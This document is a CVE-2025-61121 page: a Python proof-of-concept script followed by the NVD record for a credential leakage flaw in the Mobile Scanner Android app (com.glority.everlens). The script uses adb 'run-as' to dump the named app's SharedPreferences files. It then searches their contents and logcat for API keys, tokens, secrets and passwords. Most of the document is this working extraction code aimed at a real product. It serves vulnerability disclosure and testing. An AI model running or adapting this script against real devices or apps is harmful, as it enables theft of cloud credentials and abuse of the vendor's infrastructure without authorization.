CVE-2025-61121

# CVE-2025-61121 PoC - Mobile Scanner Credential Extraction # This PoC demonstrates the credential leakage vulnerability import subprocess import os import re def extract_shared_prefs(app_package): """ Extract SharedPreferences files containing credentials """ cmd = f'adb shell run-as {app_package} ls files/shared_prefs/' try: result = subprocess.run(cmd, shell=True, capture_output=True, text=True) prefs_files = result.stdout.strip().split('\n') print(f'[+] Found {len(prefs_files)} SharedPreferences files') for pref_file in prefs_files: if pref_file: extract_cmd = f'adb shell run-as {app_package} cat files/shared_prefs/{pref_file}' content = subprocess.run(extract_cmd, shell=True, capture_output=True, text=True) print(f'\n[+] Contents of {pref_file}:') print(content.stdout) # Search for credential patterns credential_patterns = [ r'api[_-]?key', r'token', r'secret', r'password', r'credential', r'auth' ] for pattern in credential_patterns: if re.search(pattern, content.stdout, re.IGNORECASE): print(f'[!!] Potential credential found with pattern: {pattern}') except Exception as e: print(f'[-] Error: {e}') def check_logcat(app_package): """ Check logcat for leaked credentials in app logs """ print('\n[+] Checking logcat for credential leaks...') cmd = f'adb logcat -d | grep -i {app_package} | grep -iE "(token|key|secret|credential|auth)"' try: result = subprocess.run(cmd, shell=True, capture_output=True, text=True) if result.stdout: print('[!!] Possible credentials found in logs:') print(result.stdout) else: print('[-] No obvious credentials in logs') except Exception as e: print(f'[-] Error: {e}') if __name__ == '__main__': TARGET_APP = 'com.glority.everlens' print(f'[*] Analyzing {TARGET_APP} for CVE-2025-61121') print('[*] Extracting stored credentials...') extract_shared_prefs(TARGET_APP) check_logcat(TARGET_APP) print('\n[*] Analysis complete')

{"cve": {"id": "CVE-2025-61121", "sourceIdentifier": "[email protected]", "published": "2025-10-30T17:15:39.343", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Mobile Scanner Android App version 2.12.38 (package name com.glority.everlens), developed by Glority Global Group Ltd., contains a credential leakage vulnerability. Improper handling of cloud service credentials may allow attackers to obtain them and carry out unauthorized actions, such as sensitive information disclosure and abuse of cloud resources. Successful exploitation could result in privacy breaches and misuse of the platform infrastructure."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-523"}]}], "references": [{"url": "https://kar1oz.notion.site/Mobile-Scanner-2659a473ecb28058a9f3e06cff61781c", "source": "[email protected]"}]}}